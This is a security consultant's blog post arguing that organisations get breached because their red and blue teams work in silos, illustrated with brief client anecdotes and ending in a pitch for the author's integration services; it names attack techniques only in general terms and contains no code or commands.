top of page
  • X
  • Facebook
  • Linkedin
  • Instagram
Search

Your Red Team and Blue Team Don't Talk. That's Why You Keep Getting Breached.

ree

Last week I watched something that happens constantly in our industry.


A client's blue team was investigating suspicious traffic. Nothing crazy—just odd patterns in their Splunk. Meanwhile, their red team was two floors up running a pentest using the exact same techniques the blue team was tracking.


Nobody told anyone. The teams don't talk.


Real attackers don't work in silos. They run automated recon, exploit vulnerabilities in real-time and adapt to your defenses faster than your ticket queue updates. They operate like a single coordinated unit with shared intelligence, shared tools and shared objectives.


Your defense? Two teams that barely share a calendar.


The Traditional Model Doesn't Work Anymore


We've accepted this organizational structure for years as just "how security teams work":

Blue Team operates the SOC, monitors alerts, responds to incidents, maintains defensive tooling. They're measured on mean time to detect and mean time to respond. Their world is dashboards, SIEM queries and alert fatigue.


Red Team runs periodic assessments, finds vulnerabilities, writes detailed reports and moves on to the next engagement. They're measured on findings count and successful exploits. Their world is exploit frameworks, command-and-control infrastructure and proof-of-concept demonstrations.


Neither team is failing at their job. The problem is that the gap between them, the organizational and operational space where information doesn't flow, is exactly where sophisticated attackers are winning.


What I'm Actually Seeing in the Field


Three weeks ago I reviewed an incident response at a financial services company. They had both a mature SOC with a dedicated team of analysts and an established red team that ran quarterly assessments. Good budget, good people, good intentions.


The breach worked because the attacker used a specific living-off-the-land technique involving PowerShell and WMI that the red team had documented in excruciating detail six months earlier during a penetration test. The finding was in a 47-page report that went to the CISO's office. The blue team never saw it. Different reporting chains, different priorities, different meetings, different ticketing systems.


The cost? Six figures in incident response and remediation. Customer notification letters. Board presentations. The whole nightmare.


When I asked the SOC manager if they'd seen the red team's report, he said "I didn't even know we had a red team report from that quarter." When I asked the red team lead if they'd shared their TTPs with the SOC, he said "we sent the report to leadership—that's our deliverable."


Both answers were technically correct. Both teams did their jobs. The organization still got breached.


This isn't an isolated case.


In another example we talked with a healthcare organization where the blue team implemented new EDR controls that the red team could bypass in under an hour, but nobody thought to test before deployment. The red team found out about the new controls the same way everyone else did—via email announcement.


A manufacturing company where the red team discovered critical vulnerabilities in their OT environment that the blue team's monitoring couldn't detect because nobody had ever configured OT-specific detection logic. The blue team didn't know what "normal" looked like in that environment.


A tech startup where attackers used the exact same initial access vector, a specific phishing technique targeting their SSO implementation, that the red team had demonstrated in a tabletop exercise eight months prior. The blue team had been in that room, but never translated the scenario into actual detection rules.


An enterprise where both teams used completely different threat intelligence feeds, different frameworks for categorizing attacks, and different terminology for describing the same techniques. When they tried to collaborate during an incident, they literally couldn't communicate effectively.


Organizations spending millions on security tools, "next-gen firewalls", EDR, SIEM, SOAR platforms, without the integrated expertise to configure them properly because the people who understand how attacks work don't talk to the people who configure the defenses.

The gap isn't just inefficient. It's actively dangerous. It's a structural vulnerability that attackers exploit as reliably as an unpatched CVE.


Why Attackers Are Winning This Game


Based on threat intelligence and attack pattern analysis from recent incidents, modern threat actors, nation-state APT groups, organized cybercrime syndicates, sophisticated ransomware operators, operate as unified teams. They don't have red teams and blue teams. They have operational teams.


Look at how these attacks actually unfold. Initial reconnaissance directly informs exploitation attempts. Successful exploitation determines privilege escalation methods. Privilege escalation results shape lateral movement paths. Lateral movement discovers new targets for reconnaissance.


One continuous operational loop.


The attack patterns we're analyzing show increasing automation and coordination. Reconnaissance frameworks are mapping entire environments, subnets, systems, services, trust relationships, in hours instead of days. Attack groups are clearly testing their methods before deploying them, evidenced by the polish and efficiency we see in actual breaches.


What stands out in incident analysis is the operational sophistication. These groups have better documentation practices than most corporate security teams. Their attack chains show careful planning and coordination. They adapt mid-attack based on what they discover about defenses.


They operate like water, flowing through whatever gap exists. And here's what keeps showing up in incident after incident: the gap that matters isn't usually in the firewall rules or patch management or endpoint protection. It's in the space between the people who know how attacks work and the people defending against them.


Why Purple Team Exercises Miss the Point


I know what you're thinking right now. "Keith, we do purple team exercises. We've got this covered. We run them quarterly, sometimes more. Red team attacks, blue team defends, we all learn something."


Good. I'm glad you're doing them. But it's not enough.


Most purple team exercises I see are events. They're scheduled activities with a defined start time, defined scope, and defined end time. Red team runs an attack scenario, blue team watches or responds, everyone sits in a conference room afterward and discusses lessons learned, maybe someone takes notes, and then both teams go back to their separate operational worlds.


It's like a joint training exercise between two military units that ends when everyone goes home. Valuable? Sure. But it's not the same as those units actually operating together in the field.


The problems I'm describing aren't solved by quarterly events. They're solved by continuous operational integration.


When I talk to security leaders about their purple team programs, I ask a simple question: "Three months after your last purple team exercise, how many of the red team's attack techniques are now detectable by your blue team's monitoring?"


The answer is usually somewhere between "some" and "we're not really sure."


That gap, between learning something during an exercise and actually operationalizing that knowledge into your defensive posture, is where the value gets lost.


What Operational Integration Actually Looks Like


The organizations that are adapting successfully to this reality aren't just scheduling more purple team exercises. They're fundamentally restructuring how offensive and defensive capabilities work together on a continuous basis.


I worked with a financial services company last year that made this transition. Their starting point was typical; the red team reported to the CTO, blue team reported to the CISO, they ran purple team exercises twice a year, and they kept finding the same types of gaps during incident response.


Here's what they changed.


First, they created shared operational visibility. Both teams now work from the same platforms. When the red team conducts any testing, whether it's a formal assessment or just validating a new attack technique they read about, the artifacts, TTPs, and indicators are immediately visible to the blue team. Not in a report that gets delivered weeks later. Immediately.


When the blue team deploys a new detection rule or modifies their SIEM correlation logic, the red team can see exactly what they're trying to detect and can validate whether it would actually work against real attacker methods. Not theoretical attacks from a textbook. Real methods they've used in actual engagements.


They implemented continuous threat-informed defense. When a blue team analyst sees a new attack technique in a threat intelligence report, they can ask the red team "can you replicate this in our lab environment?" Within hours, not weeks, they're testing whether their current defenses would catch it.


When the red team discovers a new bypass technique for their EDR or a weakness in their network segmentation, they don't wait for the next assessment cycle. They document it immediately and work with the blue team to understand why the detection didn't fire and what needs to change.


The Cultural Shift Nobody Talks About


Here's the part that most articles about purple teaming or red-blue integration completely miss: the hardest part isn't technical. It's cultural.


I've worked with organizations that had all the right tools, all the right processes on paper, all the right executive support, and it still didn't work. Because the teams didn't trust each other.


Red teams often see blue teams as the people who make excuses for why they can't detect things. "That's a really sophisticated technique, we can't be expected to catch that."

Blue teams often see red teams as the people who criticize their work without understanding operational constraints. "Easy for you to find vulnerabilities when you don't have to maintain production systems."


Both perspectives have some validity. That's what makes it hard.


The red team that successfully transitioned to integrated operations wasn't the one with the best exploit developers. It was the one whose team lead stood up in a meeting and said "our job isn't to make blue team look bad. Our job is to make blue team better at their job. If we find something they can't detect, that's a shared problem we need to solve together."

The blue team that made it work wasn't the one with the fanciest SIEM. It was the one whose SOC manager said "when red team bypasses our defenses, that's not a failure. That's intelligence. They just showed us what a real attacker would do. Now we know what to fix."


That shift, from separate teams with separate goals to one integrated capability with a shared mission, doesn't happen because you reorganize the reporting structure or implement a new tool. It happens because leadership sets the expectation and both teams decide to operate differently.


I've seen this work at companies ranging from 500 employees to 5,000 employees. The size doesn't matter as much as the commitment to actually operating as one capability instead of two separate functions that occasionally coordinate.


What It Actually Takes to Make This Work


Let me be direct about what's required to make this transition, because I've seen plenty of organizations try and fail.


You need leadership that understands this isn't about reorganizing the security team for the sake of reorganization. It's about building a defensive capability that can actually adapt to modern threats. Your CISO or security director needs to be able to articulate to the board why integrated operations deliver better security outcomes than the traditional model, backed by metrics that matter to the business.


I worked with one organization where the CISO presented it this way: "We're currently spending $X per year on security testing and $Y per year on security operations. Despite this investment, our mean time to detect real attacks is 37 days, and we've had three incidents in the past year. By integrating these capabilities, we can cut our detection time to under 7 days and significantly reduce incident frequency. The cost is roughly the same. The outcome is dramatically better."


The board approved it immediately because the business case was clear.


You need both teams to see each other as complementary capabilities rather than competing priorities. This sounds obvious, but it's harder than it sounds when both teams have been measured on different metrics, rewarded for different outcomes and operated in different contexts for years.


The way I've seen this work best is to start with a small joint project, something where both teams clearly need each other to succeed. Not a purple team exercise. A real operational objective. "We need to validate whether our new zero-trust architecture would actually stop an attacker who's compromised a user account." Red team brings exploitation expertise. Blue team brings operational knowledge. Both teams are measured on whether the validation is thorough and whether the results lead to meaningful improvements.


You need workflows that support continuous collaboration instead of quarterly coordination. This means your ticketing systems need to talk to each other, your documentation needs to be shared, your daily standups need to include both perspectives, and your incident response procedures need to automatically engage both capabilities.


I've seen organizations waste months trying to integrate their tools before integrating their people. That's backwards. Start with the people collaborating, figure out what workflows actually help them work together, then implement tools that support those workflows.

You need metrics that reflect integrated effectiveness rather than individual team accomplishments. If you're still measuring red team on "number of critical findings" and blue team on "number of alerts processed," you haven't actually integrated. You've just put two separate teams in the same room.


Develop better metrics; percentage of known attack techniques that your defenses can detect, time from vulnerability discovery to detection capability deployment, number of incidents detected using TTPs that were previously tested by red team, mean time to detect during continuous adversary emulation.


These metrics require both teams to succeed. Neither team can achieve them alone.


You need a security stack that supports unified operations. This doesn't mean buying new tools. It means configuring your existing tools so that both teams can work from the same operational picture. Your SIEM needs to ingest data from red team testing. Your ticketing system needs to track both vulnerabilities and detection gaps. Your threat intelligence platform needs to include both external threats and internal red team findings.


Most organizations already have the tools they need. They just haven't configured them to support integrated operations.


What Happens If You Don't Do This


Let me paint you a picture of what the next three years look like if you keep operating with separate red and blue teams.


Your attackers will continue getting more sophisticated. They're already using automation, machine learning and continuous adaptation. The gap between their operational tempo and yours will keep growing.


You'll keep having incidents where somebody says "wait, didn't we test this?" and the answer is yes, you did test it, six months ago and nothing changed.


You'll keep spending money on security tools that don't integrate with your operational workflows, generating alerts that your team doesn't have context to evaluate effectively.

You'll keep losing people. Your best red teamers will leave because they're tired of finding problems that don't get fixed. Your best blue teamers will leave because they're tired of getting blamed for breaches that used techniques nobody told them about.


Your board will keep asking why the security budget keeps increasing while incidents keep happening.


But here's what happens if you do integrate these capabilities.


You build a security program that learns from every test, every incident, every near-miss. Your defenses get stronger continuously, not just during assessment cycles.


You detect real attacks faster because your blue team has been trained against realistic attack patterns by your red team and your red team has validated that the detections actually work.


You respond to incidents more effectively because you have people who understand both how attackers operate and how your specific environment works, collaborating in real-time.

You make better investment decisions because both offensive and defensive perspectives inform your security roadmap.


You retain your best people because they're doing meaningful work that delivers visible results instead of generating reports that disappear into the void.


The organizations that figure this out over the next couple of years will have security programs that can actually keep pace with the threats they face. The ones that don't will keep writing the same incident response reports with different dates at the top.


Let's Talk About Your Situation


I help organizations make this transition. Not by selling them new tools or running purple team exercises. By deploying integrated operational models that treat offensive and defensive capabilities as parts of the same adaptive security capability.


The results I'm seeing: organizations cutting their mean time to detect sophisticated attacks by 60-70%, reducing incident frequency by half or more, and significantly improving their security team's effectiveness without increasing headcount.


If your red and blue teams are still operating in separate worlds—separate meetings, separate priorities, separate workflows—we should talk. I'll share specifically what's working for organizations similar to yours in terms of size, industry, and threat model. We can figure out whether integrated operations makes sense for your environment and what a realistic implementation would look like given your current constraints.


Not a sales pitch. A conversation about whether this approach would actually work in your situation. If it would, we'll talk about what that looks like. If it wouldn't, I'll tell you that too and probably point you toward something that would work better.


Best,


Keith Pachulski

Red Cell Security, LLC

 
 
 

© 2025 by Red Cell Security, LLC.

bottom of page